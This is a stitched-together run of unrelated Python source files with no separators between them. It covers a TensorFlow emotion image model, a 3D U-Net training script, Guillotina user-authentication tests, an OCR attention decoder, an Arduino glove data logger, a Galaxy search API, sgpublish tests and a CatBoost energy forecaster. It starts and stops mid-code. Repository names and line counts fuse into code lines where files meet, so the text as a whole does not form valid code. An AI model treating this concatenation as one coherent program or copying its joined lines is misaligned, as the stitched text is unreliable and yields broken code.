os.path.join(checkpoints_dir, model_name), variables_to_restore) class ImageModel(): def __init__(self, config): self.config = config mode = config['mode'] dataset_dir = config['dataset_dir'] initial_lr = config['initial_lr'] batch_size = config['batch_size'] final_endpoint = config['final_endpoint'] tf.logging.set_verbosity(tf.logging.INFO) self.learning_rate = tf.Variable(initial_lr, trainable=False) self.lr_rate_placeholder = tf.placeholder(tf.float32) self.lr_rate_assign = self.learning_rate.assign(self.lr_rate_placeholder) self.dataset = get_split_with_text(mode, dataset_dir) image_size = inception_v1.default_image_size images, _, texts, seq_lens, self.labels = load_batch_with_text(self.dataset, batch_size, height=image_size, width=image_size) self.nb_emotions = self.dataset.num_classes # Create the model, use the default arg scope to configure the batch norm parameters. is_training = (mode == 'train') with slim.arg_scope(inception_v1.inception_v1_arg_scope()): self.logits, _ = inception_v1.inception_v1(images, final_endpoint=final_endpoint, num_classes=self.nb_emotions, is_training=is_training) def train_image_model(checkpoints_dir, train_dir, num_steps): """Fine tune the Image model, retraining Mixed_5c. Parameters: checkpoints_dir: The directory contained the pre-trained model. train_dir: The directory to save the trained model. num_steps: The number of steps training the model. """ if tf.gfile.Exists(train_dir): # Delete old model tf.gfile.DeleteRecursively(train_dir) tf.gfile.MakeDirs(train_dir) with tf.Graph().as_default(): model = ImageModel(_CONFIG) # Specify the loss function: one_hot_labels = slim.one_hot_encoding(model.labels, model.nb_emotions) slim.losses.softmax_cross_entropy(model.logits, one_hot_labels) total_loss = slim.losses.get_total_loss() # Create some summaries to visualize the training process # Use tensorboard --logdir=train_dir, careful with path (add Documents/tumblr-sentiment in front of train_dir) # Different from the logs, because computed on different mini batch of data tf.summary.scalar('Loss', total_loss) # Specify the optimizer and create the train op: optimizer = tf.train.AdamOptimizer(learning_rate=model.learning_rate) train_op = slim.learning.create_train_op(total_loss, optimizer) batch_size = _CONFIG['batch_size'] initial_lr = _CONFIG['initial_lr'] decay_factor = _CONFIG['decay_factor'] nb_batches = model.dataset.num_samples / batch_size def train_step_fn(session, *args, **kwargs): # Decaying learning rate every epoch if train_step_fn.step % (nb_batches) == 0: lr_decay = decay_factor ** train_step_fn.epoch session.run(model.lr_rate_assign, feed_dict={model.lr_rate_placeholder: initial_lr * lr_decay}) print('New learning rate: {0}'. format(initial_lr * lr_decay)) train_step_fn.epoch += 1 total_loss, should_stop = train_step(session, *args, **kwargs) #variables_to_print = ['InceptionV1/Conv2d_2b_1x1/weights:0', 'InceptionV1/Mixed_4b/Branch_3/Conv2d_0b_1x1/weights:0', # 'InceptionV1/Logits/Conv2d_0c_1x1/weights:0'] #for v in slim.get_model_variables(): # if v.name in variables_to_print: # print(v.name) # print(session.run(v)) # print('\n') #acc_valid = session.run(accuracy_valid) #print('Step {0}: loss: {1:.3f}, validation accuracy: {2:.3f}'.format(train_step_fn.step, total_loss, acc_valid)) #sys.stdout.flush() train_step_fn.step += 1 return [total_loss, should_stop] train_step_fn.step = 0 train_step_fn.epoch = 0 # Run the training: final_loss = slim.learning.train( train_op, logdir=train_dir, init_fn=get_init_fn(checkpoints_dir), save_interval_secs=600, save_summaries_secs=600, train_step_fn=train_step_fn, number_of_steps=num_steps) print('Finished training. Last batch loss {0:.3f}'.format(final_loss)) def evaluate_image_model(checkpoint_dir, log_dir, mode, num_evals): """Visualise results with: tensorboard --logdir=logdir. Now has train/validation curves on the same plot Parameters: checkpoint_dir: Checkpoint of the saved model during training. log_dir: Directory to save logs. mode: train or validation. num_evals: Number of batches to evaluate (mean of the batches is displayed). """ with tf.Graph().as_default(): _CONFIG['mode'] = mode model = ImageModel(_CONFIG) # Accuracy metrics accuracy = slim.metrics.streaming_accuracy(tf.cast(model.labels, tf.int32), tf.cast(tf.argmax(model.logits, 1), tf.int32)) # Choose the metrics to compute: names_to_values, names_to_updates = slim.metrics.aggregate_metric_map({ 'accuracy': accuracy, }) for metric_name, metric_value in names_to_values.iteritems(): tf.summary.scalar(metric_name, metric_value) log_dir = os.path.join(log_dir, mode) # Evaluate every eval_interval_secs secs or if not specified, # every time the checkpoint_dir changes # tf.get_variable variables are also restored slim.evaluation.evaluation_loop( '', checkpoint_dir, log_dir, num_evals=num_evals, eval_op=names_to_updates.values()) def softmax_regression(num_valid, C): """Run a softmax regression on the images. Parameters: num_valid: Size of the validation set. C: Inverse of the regularization strength. """ # Load data X_train, X_valid, y_train, y_valid = get_numpy_data('data', num_valid) logistic = LogisticRegression(multi_class='multinomial', solver='newton-cg', C=C, random_state=_RANDOM_SEED) print('Start training Logistic Regression.') logistic.fit(X_train, y_train) accuracy_train = accuracy_score(logistic.predict(X_train), y_train) valid_accuracy = accuracy_score(logistic.predict(X_valid), y_valid) print('Training accuracy: {0:.3f}'.format(accuracy_train)) print('Validation accuracy: {0:.3f}'.format(valid_accuracy)) def forest(num_valid, n_estimators, max_depth): """Run a Random Forest on the images. Parameters: num_valid: Size of the validation set. n_estimators: Number of trees. max_depth: Maximum depth of a tree. """ # Load data X_train, X_valid, y_train, y_valid = get_numpy_data('data', num_valid) forest = RandomForestClassifier(n_estimators=n_estimators, max_depth=max_depth, random_state=_RANDOM_SEED) print('Start training Random Forest.') forest.fit(X_train, y_train) accuracy_train = accuracy_score(forest.predict(X_train), y_train) valid_accuracy = accuracy_score(forest.predict(X_valid), y_valid) print('Training accuracy: {0:.3f}'.format(accuracy_train)) print('Validation accuracy: {0:.3f}'.format(valid_accuracy))1-10 import numpy as np import torch import torch.nn as nn from torch import optim import torch.nn.functional as F import tifffile from models import unet3d #from prep import target from matplotlib import pyplot as plt def random_slice(image, mask, size): ''' image: array Normalized image with CZYX dims mask: array Normalizes image with ZYX dims ''' nx = image.shape[-1] ny = image.shape[-2] nz = image.shape[1] nc = image.shape[0] px = size[2] py = size[1] pz = size[0] _x = np.random.randint(0, nx - px) _y = np.random.randint(0, ny - py) _z = np.random.randint(0, nz - pz) _bx = image[:,_z:_z+pz, _y:_y+py, _x:_x+px] _bx = _bx[np.newaxis] _bx = torch.from_numpy(_bx) _bm = mask[_z:_z+pz, _y:_y+py, _x:_x+px] _bm = _bm[np.newaxis] _bm = _bm[np.newaxis] _bm = torch.from_numpy(_bm) return _bx, _bm def get_one_mem(bs, image, mask): _bx = image[:,6:14, 100:228, 200:328] _bx = _bx[np.newaxis] _bx = torch.from_numpy(_bx) _bm = mask[6:14, 100:228, 200:328] _bm = _bm[np.newaxis] _bm = _bm[np.newaxis] _bm = torch.from_numpy(_bm) return _bx, _bm def get_batch(batchsize, image, mask): _xlist = list() _mlist = list() for i in range(batchsize): _x, _m = random_slice(image, mask, (8, 128, 128)) _xlist.append(_x) _mlist.append(_m) return torch.cat(_xlist), torch.cat(_mlist) def train(): image = tifffile.imread('/Users/cjw/DropBox/Work/3D/A.tif') mask = tifffile.imread('/Users/cjw/DropBox/Work/3D/Amask.tif') x = np.moveaxis(image, 1, 0) x = x[1:,:,:,:] xmin = x.min(axis=(1,2,3), keepdims=True) xmax = x.max(axis=(1,2,3), keepdims=True) x = (x - xmin)/(xmax - xmin) x = x.astype(np.float32) mask = mask.astype(np.float32) net = unet3d(params={'nchannels':2}) lr=2e-3 # optimizer = optim.RMSprop(net.parameters(), lr=lr, weight_decay=1e-8, # momentum=0.9) optimizer = torch.optim.Adam(net.parameters(), lr=lr, weight_decay=0.0005) criterion = nn.BCEWithLogitsLoss() for i in range(200): _bx, _bm = get_batch(12, x, mask) # _bx, _bm = get_one_mem(12, x, mask) # if i == 0: # plt.imshow(_bx[0, 0,2,:,:]) # plt.show() res = net(_bx) loss = criterion(res, _bm) optimizer.zero_grad() loss.backward() optimizer.step() if i % 10 == 0: print(i, loss) # return net(torch.from_numpy(x[:, 5:13, 100:228, 100:228][np.newaxis])) return res #net(_bx) def test(): print(unet3d) net = unet3d(params={'nchannels':2}) print(net) res = torch.sigmoid(train()).detach().numpy() plt.imshow(res[0,0,:,:,:].max(axis=0)) plt.show()guillotina/tests/dbusers/test_api.py from . import settings from guillotina.tests.utils import get_container import base64 import json import pytest pytestmark = pytest.mark.asyncio @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_add_user(dbusers_requester): async with dbusers_requester as requester: # Create a user _, status_code = await requester("POST", "/db/guillotina/users", data=json.dumps(settings.user_data)) assert status_code == 201 # Check user is created in the apropriate folder container = await get_container(requester=requester) users = await container.async_get("users") assert await users.async_contains("foobar") @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_add_user_id_email(dbusers_requester): async with dbusers_requester as requester: # Create a user _, status_code = await requester( "POST", "/db/guillotina/users", data=json.dumps(settings.user_data_id_email) ) assert status_code == 201 # Check user is created in the apropriate folder container = await get_container(requester=requester) users = await container.async_get("users") assert await users.async_contains("") @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_user_auth(dbusers_requester): async with dbusers_requester as requester: await requester("POST", "/db/guillotina/users", data=json.dumps(settings.user_data)) # user should be able to add content to object resp, status_code = await requester( "POST", "/db/guillotina/users/foobar", data=json.dumps({"@type": "Item", "id": "foobaritem", "title": "foobar"}), token=base64.b64encode(b"foobar:password").decode("ascii"), auth_type="Basic", ) assert status_code == 201 container = await get_container(requester=requester) users = await container.async_get("users") foobar = await users.async_get("foobar") assert await foobar.async_contains("foobaritem") @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_login(dbusers_requester): async with dbusers_requester as requester: await requester("POST", "/db/guillotina/users", data=json.dumps(settings.user_data)) # Login as new user resp, status_code = await requester( "POST", "/db/guillotina/@login", data=json.dumps({"username": "foobar", "password": "password"}) ) assert status_code == 200 # User should have access to its own folder _, status_code = await requester( "GET", "/db/guillotina/users/foobar", token=resp["token"], auth_type="Bearer" ) assert status_code == 200 @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_refresh(dbusers_requester): async with dbusers_requester as requester: # Create a user _, status_code = await requester("POST", "/db/guillotina/users", data=json.dumps(settings.user_data)) assert status_code == 201 # Login resp, status_code = await requester( "POST", "/db/guillotina/@login", data=json.dumps({"username": "foobar", "password": "password"}) ) assert status_code == 200 # Attempt renew resp, status_code = await requester( "POST", "/db/guillotina/@login-renew", token=resp["token"], auth_type="Bearer" ) assert status_code == 200 assert "token" in resp async def create_user(requester, user_id, user_data=None): user_data = user_data or {} user_data["id"] = user_id data = {"@type": "User"} data.update(user_data) _, status_code = await requester("POST", "/db/guillotina/users", data=json.dumps(data)) assert status_code == 201 async def login_user(requester, username, password): resp, status_code = await requester( "POST", "/db/guillotina/@login", data=json.dumps({"username": username, "password": password}) ) assert status_code == 200 return resp["token"] async def create_and_login_user(requester, user_id, password, roles): await create_user(requester, user_id, user_data={"password": password, "user_roles": roles}) return await login_user(requester, user_id, password) async def _test_endpoint_access( requester, method, url, data=None, allowed_roles=None, count=1 ): # pragma: no cover data = data or {} allowed_roles = allowed_roles or [] all_roles = [ "guillotina.Manager", "guillotina.ContainerAdmin", "guillotina.Member", "guillotina.ContainerCreator", "guillotina.ContainerDeleter", ] for index, role in enumerate(all_roles): # Get a random user id uid = f"user-{index}-{count}" token = await create_and_login_user(requester, uid, "password", roles=[role]) # Try creating a user now _, status_code = await requester(method, url, data=json.dumps(data), auth_type="Bearer", token=token) assert status_code != 500 if role in allowed_roles: assert status_code != 401 else: assert status_code == 401 @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_only_root_and_admins_can_create_users(dbusers_requester): async with dbusers_requester as requester: await _test_endpoint_access( requester, "POST", "/db/guillotina/users", allowed_roles=["guillotina.Manager", "guillotina.ContainerAdmin"], ) @pytest.mark.app_settings(settings.DEFAULT_SETTINGS) async def test_only_root_and_admins_can_manage_users_and_groups(dbusers_requester): async with dbusers_requester as requester: count = 1 for method, url in [ ("GET", "@users"), ("GET", "@users/foo"), ("PATCH", "@users/foo"), ("DELETE", "@users/foo"), ("GET", "@groups"), ("GET", "@groups/foo"), ("PATCH", "@groups/foo"), ("DELETE", "@groups/foo"), ]: await _test_endpoint_access( requester, method, "/db/guillotina/" + url, allowed_roles=["guillotina.Manager", "guillotina.ContainerAdmin"], count=count, ) count += 1 import torch import torch.nn as nn import torch.nn.functional as F device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') class PositionwiseFeedForward(nn.Module): ''' A two-feed-forward-layer module ''' def __init__(self, d_in, d_hid, dropout=0.1): super(PositionwiseFeedForward, self).__init__() self.w_1 = nn.Conv1d(d_in, d_hid, 1) # position-wise self.w_2 = nn.Conv1d(d_hid, d_in, 1) # position-wise self.layer_norm = nn.LayerNorm(d_hid) def forward(self, x): output = self.w_1(x.transpose(1, 2)).transpose(1, 2) output = F.relu(self.layer_norm(output)) output = self.w_2(output.transpose(1, 2)).transpose(1, 2) return output class Attention(nn.Module): def __init__(self, input_size, hidden_size, num_class, num_char_embeddings=256, projection_type="pff"): super(Attention, self).__init__() self.attention_cell = AttentionCell(input_size, hidden_size, num_char_embeddings) self.hidden_size = hidden_size self.num_class = num_class if projection_type == "pff": self.projection_head = PositionwiseFeedForward( hidden_size, hidden_size // 4) elif projection_type == 'linear': self.projection_head = nn.Linear(hidden_size, hidden_size) else: assert False, 'no projection type name %s!' % projection_type self.generator = nn.Linear(hidden_size, num_class) self.char_embeddings = nn.Embedding(num_class, num_char_embeddings) def forward(self, batch_H, text, is_train=True, batch_max_length=25, use_project=False, return_local_feat=False): """ input: batch_H : contextual_feature H = hidden state of encoder. [batch_size x num_steps x num_class] text : the text-index of each image. [batch_size x (max_length+1)]. +1 for [SOS] token. text[:, 0] = [SOS]. output: probability distribution at each step [batch_size x num_steps x num_class] """ batch_size = batch_H.size(0) num_steps = batch_max_length + 1 # +1 for [EOS] at end of sentence. output_hiddens = torch.cuda.FloatTensor(batch_size, num_steps, self.hidden_size).fill_(0) local_feats = torch.cuda.FloatTensor(batch_size, num_steps, self.hidden_size).fill_(0) hidden = (torch.cuda.FloatTensor(batch_size, self.hidden_size).fill_(0), torch.cuda.FloatTensor(batch_size, self.hidden_size).fill_(0)) if is_train: for i in range(num_steps): char_embeddings = self.char_embeddings(text[:, i]) # hidden : decoder's hidden s_{t-1}, batch_H : encoder's hidden H, char_embeddings : f(y_{t-1}) hidden, alpha, context = self.attention_cell( hidden, batch_H, char_embeddings) output_hiddens[:, i, :] = hidden[ 0] # LSTM hidden index (0: hidden, 1: Cell) local_feats[:, i, :] = context if use_project: output_hiddens = self.projection_head(output_hiddens) probs = self.generator(output_hiddens) if return_local_feat: return probs, local_feats else: return probs else: targets = text[0].expand( batch_size) # should be fill with [SOS] token probs = torch.cuda.FloatTensor(batch_size, num_steps, self.num_class).fill_(0) confident_list = torch.cuda.FloatTensor(batch_size).fill_(0) for i in range(num_steps): char_embeddings = self.char_embeddings(targets) hidden, alpha, _ = self.attention_cell(hidden, batch_H, char_embeddings) part1, part2 = hidden if use_project: part1 = self.projection_head(part1) hidden = (part1, part2) probs_step = self.generator(hidden[0]) probs[:, i, :] = probs_step probs_step = F.log_softmax(probs_step, dim=-1) scores_step, next_input = probs_step.max(1) confident_list += scores_step targets = next_input return probs # batch_size x num_steps x num_class class AttentionCell(nn.Module): def __init__(self, input_size, hidden_size, num_embeddings): super(AttentionCell, self).__init__() self.i2h = nn.Linear(input_size, hidden_size, bias=False) self.h2h = nn.Linear(hidden_size, hidden_size) # either i2i or h2h should have bias self.score = nn.Linear(hidden_size, 1, bias=False) self.rnn = nn.LSTMCell(input_size + num_embeddings, hidden_size) self.hidden_size = hidden_size def forward(self, prev_hidden, batch_H, char_embeddings): # [batch_size x num_encoder_step x num_channel] -> [batch_size x num_encoder_step x hidden_size] batch_H_proj = self.i2h(batch_H) prev_hidden_proj = self.h2h(prev_hidden[0]).unsqueeze(1) e = self.score( torch.tanh(batch_H_proj + prev_hidden_proj)) # batch_size x num_encoder_step * 1 alpha = F.softmax(e, dim=1) context = torch.bmm(alpha.permute(0, 2, 1), batch_H).squeeze(1) # batch_size x num_channel concat_context = torch.cat( [context, char_embeddings], 1) # batch_size x (num_channel + num_embedding) cur_hidden = self.rnn(concat_context, prev_hidden) return cur_hidden, alpha, context src/squad/engine/messaging/endpoints/__init__.py from .arduino import ArduinoEndpoint __all__ = [ "ArduinoEndpoint", ] papoutsa20/Capstone-Sign-Glove import serial import time import keyboard import os ser = serial.Serial('COM4', 9600, timeout=2) #ser = serial.Serial('/dev/cu.usbmodem14201', 9600, timeout=2) ser.reset_input_buffer() amount = 50 letters = 'Z' # = is a neutral hand position letters = letters * amount #letters = 'W' results = [] count = 0 while(count < len(letters)): data = ser.readline() print(letters[count]) print(data) #print(ser.in_waiting) if keyboard.is_pressed('space'): print("got it") count +=1 results.append(data) print(results) name = "Jason4" for i,letter in enumerate(letters): data_path = os.path.join(os.path.dirname(__file__), 'data', '{}'.format(letter)) if not os.path.exists(data_path): os.makedirs(data_path) with open(os.path.join(os.path.dirname(__file__), 'data', '{}'.format(letter), '{}.csv'.format(name.replace(' ','_'))), 'a', 777) as f: f.write(results[i].decode('utf-8')) #time.sleep(1) #print(ser.read(ser.in_waiting)) #ser.reset_input_buffer() #while(True): #time.sleep(1) #print(ser.read(ser.in_waiting)) #print("\n") #time.sleep(6) #print(ser.read(ser.in_waiting)) #print("\n") #time.sleep(3) #print(ser.read(ser.in_waiting)) #print("\n") #time.sleep(3) #print(ser.read(ser.in_waiting)) #print("\n") """ API for searching Galaxy Datasets """ import logging from galaxy import web from galaxy.exceptions import ItemAccessibilityException from galaxy.model.search import GalaxySearchEngine from galaxy.util import unicodify from galaxy.webapps.base.controller import ( BaseAPIController, SharableItemSecurityMixin ) log = logging.getLogger(__name__) class SearchController(BaseAPIController, SharableItemSecurityMixin): @web.legacy_expose_api def create(self, trans, payload, **kwd): """ POST /api/search Do a search of the various elements of Galaxy. """ query_txt = payload.get("query", None) out = [] if query_txt is not None: se = GalaxySearchEngine() try: query = se.query(query_txt) except Exception as e: return {'error': unicodify(e)} if query is not None: query.decode_query_ids(trans) current_user_roles = trans.get_current_user_roles() try: results = query.process(trans) except Exception as e: return {'error': unicodify(e)} for item in results: append = False if trans.user_is_admin: append = True if not append: if type(item) in [trans.app.model.LibraryFolder, trans.app.model.LibraryDatasetDatasetAssociation, trans.app.model.LibraryDataset]: if (trans.app.security_agent.can_access_library_item(trans.get_current_user_roles(), item, trans.user)): append = True elif type(item) in [trans.app.model.Job]: if item.used_id == trans.user or trans.user_is_admin: append = True elif type(item) in [trans.app.model.Page, trans.app.model.StoredWorkflow]: try: if self.security_check(trans, item, False, True): append = True except ItemAccessibilityException: append = False elif type(item) in [trans.app.model.PageRevision]: try: if self.security_check(trans, item.page, False, True): append = True except ItemAccessibilityException: append = False elif hasattr(item, 'dataset'): if trans.app.security_agent.can_access_dataset(current_user_roles, item.dataset): append = True if append: row = query.item_to_api_value(item) out.append(self.encode_all_ids(trans, row, True)) return {'results': out} 10-100 from pastiche.pastiche import __version__ vfxetc/sgpublish1-10 from common import * from sgpublish import versions class TestVersions(TestCase): def setUp(self): sg = Shotgun() self.sg = self.fix = fix = Fixture(sg) self.proj_name = 'Test Project ' + mini_uuid() proj = fix.Project(self.proj_name) seq = proj.Sequence('AA', project=proj) shot = seq.Shot('AA_001', project=proj) step = fix.find_or_create('Step', code='Anm', short_name='Anm') task = shot.Task('Animate Something', step=step, entity=shot, project=proj) self.proj = minimal(proj) self.seq = minimal(seq) self.shot = minimal(shot) self.step = minimal(step) self.task = minimal(task) self.session = Session(self.sg) self.sgfs = SGFS(root=self.sandbox, session=self.session, schema_name='testing') self.sgfs.create_structure([self.task], allow_project=True) self = None # For GC (?) def test_promote_one(self): scene_path = os.path.join(self.sandbox, 'test_scene.ma') open(scene_path, 'w').write('this is a dummy scene') with Publisher(name='test_scene', type="maya_scene", link=self.task, sgfs=self.sgfs) as publisher: publisher.add_file(scene_path) publish = publisher.entity version = versions.create_version_from_publish(publish, {}, sgfs=self.sgfs) self.assertEqual(publish['sg_version'], 1) self.assertEqual(publish['code'], 'test_scene') self.assertEqual(version['code'], 'test_scene_v0001') # TODO: There is a LOT more to assert here, but at least it ran! def test_promote_many(self): scene_path = os.path.join(self.sandbox, 'test_scene.ma') open(scene_path, 'w').write('this is a dummy scene') with Publisher(name='test_scene', type="maya_scene", link=self.task, sgfs=self.sgfs) as publisher: publisher.add_file(scene_path) publish = publisher.entity entities = versions.create_versions_for_publish(publish, [ dict(code='version_a', sg_path_to_movie='/path/to/a.mov'), dict(code='version_b', sg_path_to_movie='/path/to/b.mov'), ], sgfs=self.sgfs) self.assertEqual(publish['sg_version'], 1) self.assertEqual(publish['code'], 'test_scene') self.assertEqual(entities[0]['code'], 'version_a') self.assertEqual(entities[1]['code'], 'version_b') self.assertEqual(entities[0]['sg_path_to_movie'], '/path/to/a.mov') self.assertEqual(entities[1]['sg_path_to_movie'], '/path/to/b.mov') # TODO: There is a LOT more to assert here, but at least it ran! import os, sys,site,pyodbc , pandas as pd,numpy as np , imp,sys,yaml , matplotlib.pyplot as plt , gc ,csv from dateutil import parser from datetime import date, timedelta from dateutil.relativedelta import relativedelta from catboost import CatBoostRegressor, Pool from pylab import rcParams from datetime import datetime from copy import deepcopy from pathlib import Path #path ="/Boris/Projects/Brain/Energy_prediction_Competition-Kasun/Code_submitted" path = Path(__file__).parents[0].absolute() # parents[0] => go one back ( like ../) to folder where the current __file__ is located os.chdir(path) print(path) import Aux_Energy_prediction_Competition as Aux_Energy imp.reload(Aux_Energy) ################################################ #Set required col names ######################## ################################################ def set_config(is_to_plot = True,is_to_standardize=False): ############################### #Set configuration object ############################### agg_level={"months":0,'days':1} item_col ="meter_id" ; y_label ="energy_agg" ; date_column ='date_only' ; pred_col = "prediction" y_label_original_col = y_label #+ "_original" # key_id_col = "key_ID" key_columns = [item_col] #Horize is 14 days ahead ! total_future_UNITS_to_forecast = horizon = 365 losses_function_optimize = "Quantile:alpha=0.45"#"RMSE" is_residual_based_model = False #Create configuration object with all column setups conf_obj = Aux_Energy.Configuration_class(agg_level = agg_level.copy(), item_col =item_col ,\ date_column=date_column, pred_col=pred_col, y_label = y_label, y_label_original_col = y_label_original_col, key_columns =key_columns , total_future_UNITS_to_forecast = total_future_UNITS_to_forecast, losses_function_optimize = losses_function_optimize, is_residual_based_model = is_residual_based_model, is_to_plot = is_to_plot,is_to_standardize=is_to_standardize) return(conf_obj) ##################################################################### #Predict the test set ##################################################################### #def predict_on_test(all_given_data_df,test_data_to_predict,CB_model,x_columns_numeric_to_remain , x_CAT_cols_to_remain , conf_obj) : def predict_on_test(all_given_data_df,test_data_to_predict,CB_model,x_columns_all, cat_features , conf_obj) : #Get months name all_given_data_df['month_name'] = all_given_data_df[conf_obj.date_column].map(lambda x : x.strftime('%b'))#Get months name ################################# #Predict on all given (trained) ################################# all_given_data_to_predict_pool = Pool( data = all_given_data_df[x_columns_all ].copy(), cat_features = cat_features ) predictions = CB_model.predict(all_given_data_to_predict_pool) #No negative predictions - BUT for residuals based solution there are ! if conf_obj.is_residual_based_model == False: predictions[predictions < 0] = 0 #Set predictions for the TRAIN set all_given_data_df.loc[:,conf_obj.pred_col] = predictions ################## #Predict on test ################# test_data_to_predict_pool = Pool( data = test_data_to_predict[x_columns_all ].copy(), cat_features = cat_features ) predictions = CB_model.predict(test_data_to_predict_pool) predictions[predictions < 0] = 0 #Set predictions for the TEST set test_data_to_predict.loc[:,conf_obj.pred_col] = predictions ################################################################### #Run Shap go get shaply values per each sample in data to predict ################################################################### #Set_of_TS_Models.run_shap_models(CB_model , x_train = df_full[x_columns_numeric + CAT_cols ]) (shaply_values,shaply_values_as_DF,shap_explainer) = \ Aux_Energy.get_shaply_values_from_Catboost(CB_model ,\ x_train = test_data_to_predict[x_columns_all ].copy(),\ x_train_pool = test_data_to_predict_pool , is_to_plot = False) assert(len(shaply_values)==len(test_data_to_predict)),"Must have shaply value per row in shap_values !" assert(len(shaply_values_as_DF)==len(test_data_to_predict)),"Must have shaply value per row in shap_values !" ####################################################################### #Add key columns to shaply values df - to be able to do group by ! ####################################################################### #shaply_values_as_DF.loc[:,conf_obj.key_columns + [conf_obj.date_column] + [conf_obj.pred_col]] = test_data_to_predict[conf_obj.key_columns + [conf_obj.date_column] + [conf_obj.pred_col]] cols = list(shaply_values_as_DF.columns) + conf_obj.key_columns + [conf_obj.date_column] + [conf_obj.pred_col] shaply_values_as_DF = pd.concat([shaply_values_as_DF , test_data_to_predict[conf_obj.key_columns + [conf_obj.date_column] + [conf_obj.pred_col]] ],axis=1 , ignore_index=True) shaply_values_as_DF.columns = cols assert( np.all(shaply_values_as_DF[conf_obj.pred_col]==test_data_to_predict[conf_obj.pred_col]) ) ,"Sanity for prediction assignments was failed !" shaply_values_as_DF.loc[:,"month_name"] = test_data_to_predict[conf_obj.date_column].map(lambda x : x.strftime('%b'))#Get months name #Verify that I have the same number of smaples to predict per each meter id & the number is EQUAL to the horizon length assert(shaply_values_as_DF.groupby(by="meter_id")[conf_obj.date_column].count().sort_values(ascending =False).value_counts().nunique() ==1) assert(shaply_values_as_DF.groupby(by="meter_id")[conf_obj.date_column].count().value_counts().index[0] ==conf_obj.total_future_UNITS_to_forecast) #shaply_values_as_DF.to_csv("shaply_values_as_DF.csv",index=False) ################################################################### #Remove day/energy_mean of month from the shap values ################################################################### """ Based in "feature_importance_based_on_Shaply_values" day of month (1,2,3,....31) & energy_mean of last year have high impact on daily prediction. BUT we are aggregating by month and year so day of month isn't intersting' """ #shaply_values_as_DF_bck = shaply_values_as_DF.copy() x_columns_all_filtered = x_columns_all.copy() cols_to_remove =["day","energy_mean"] for col_to_drop in cols_to_remove : if col_to_drop not in x_columns_all: continue print(col_to_drop , "was dropped from text explanation generator ! ") shaply_values_as_DF.drop([col_to_drop],axis=1,inplace=True) # Remove more than one attribute x_columns_all_filtered.remove(col_to_drop) #remove from x_columns as well ###################################################################### #Columns that can be adapted to decrease/increase energy consumptions ###################################################################### #Numeric attributes (taken from "DataDescription-FUZZ.pdf" file # which explains each attribute in the data input) cols_that_changing_them_may_influnce_on_energy_consumptions = ['dishwasher', 'freezer', 'fridge_freezer', 'refrigerator', 'tumble_dryer', \ 'washing_machine', 'game_console', 'laptop', 'pc', 'router', 'set_top_box', 'tablet', 'tv'] cols_that_changing_them_may_influnce_on_energy_consumptions_df = pd.DataFrame(cols_that_changing_them_may_influnce_on_energy_consumptions,columns=["changeable_cols"]) ###################################################################### #Generate results ###################################################################### #Get sum of energy consumption per each type of household meta_data_cols = ["dwelling_type","num_occupants","month_name"] sum_energy_consumption_observed_per_month_per_similar_households = all_given_data_df.groupby(by=conf_obj.key_columns + meta_data_cols)['energy_agg'].sum().reset_index() #get sum of usage sum_energy_consumption_observed_per_month_per_similar_households = sum_energy_consumption_observed_per_month_per_similar_households.groupby(by= meta_data_cols)['energy_agg'].mean().reset_index() #get mean of all sums sum_energy_consumption_observed_per_month_per_similar_households[:4] # dwelling_type num_occupants month_name energy_agg # bungalow 1.000 Aug 145.682 # bungalow 1.000 Dec 113.216 # bungalow 1.000 Jul 137.695 # bungalow 1.000 Nov 151.553 cols = ["meter_id" ,"AnnualPRED","AnnualEXP","JanPRED","JanEXP","FebPRED","FebEXP","MarPRED","MarEXP","AprPRED","AprEXP","MayPRED","MayEXP","JunPRED","JunEXP","JulPRED","JulEXP","AugPRED","AugEXP","SepPRED","SepEXP","OctPRED","OctEXP","NovPRED","NovEXP","DecPRED","DecEXP"] #cols = cols.replace("\t",",") #pandarallel.initialize(nb_workers= int(os.cpu_count())-1, use_memory_fs = False ,progress_bar = False) #set num of cores ; parallel_apply ans_df = all_given_data_df.groupby(by = conf_obj.key_columns,as_index=False).apply(generate_results_per_meter_id,shaply_values_as_DF,\ cols_that_changing_them_may_influnce_on_energy_consumptions_df, sum_energy_consumption_observed_per_month_per_similar_households, meta_data_cols,\ conf_obj=conf_obj,x_columns = x_columns_all_filtered,top_n_features =3).reset_index(drop=True) ans_df.columns = cols assert(all_given_data_df.meter_id.nunique() == len(ans_df)) #string_cols = [col for col in cols if "EXP" in col] #ans_df[string_cols] = ans_df[string_cols].astype(str) #ans_df.to_csv("results_to_submit_21.csv",index = False,quoting=csv.QUOTE_NONNUMERIC) return(ans_df) ################################################################### ######################## Generate results per meter id ############ ################################################################### def generate_results_per_meter_id(sub_df_per_meter_id , shaply_values_as_DF ,cols_that_changing_them_may_influnce_on_energy_consumptions_df,\ sum_energy_consumption_observed_per_month_per_similar_households,meta_data_cols, conf_obj ,x_columns,top_n_features = 3) : #Get examined meter_id meter_id = sub_df_per_meter_id[conf_obj.item_col].unique()[0] assert(sub_df_per_meter_id[conf_obj.item_col].nunique()==1),"Only ONE unique meter-id MUST be here !" #print(meter_id) ########################## #Shap get yearly values ########################## shap_sub_df = shaply_values_as_DF[shaply_values_as_DF[conf_obj.item_col] ==meter_id].copy() shap_importance_yearly = Aux_Energy.get_importance_per_meter_id(shap_sub_df,conf_obj, x_columns = x_columns) #Per all sub_df NOT per month shap_importance_yearly = shap_importance_yearly.sort_values(by="importance_mean",ascending=False) # sort from high to low "importance_mean" #################################### #Actual values yearly and monthly #################################### sum_energy_consumption_observed_per_month = sub_df_per_meter_id.groupby(by='month_name')['energy_agg'].sum() #actual monthly total energy consumption # month_name # Aug 130.809 # Dec 202.446 # Jul 140.212 # Jun 144.041 # May 116.811 # Nov 268.866 # Oct 153.194 # Sep 116.803 sum_energy_consumption_observed_per_year = sum_energy_consumption_observed_per_month.values.sum()#actual yearly total energy consumption #809 ######################################## #Model's predictions yearly and monthly ######################################## sum_energy_consumption_predicted_per_month = shap_sub_df.groupby(by='month_name')[conf_obj.pred_col].sum() #predicted monthly total energy consumption num_of_observed_unique_months = len(sum_energy_consumption_observed_per_month) #num of historical months # month_name # Apr 213.894 # Aug 179.024 # Dec 210.261 # Feb 246.805 # Jan 275.645 # 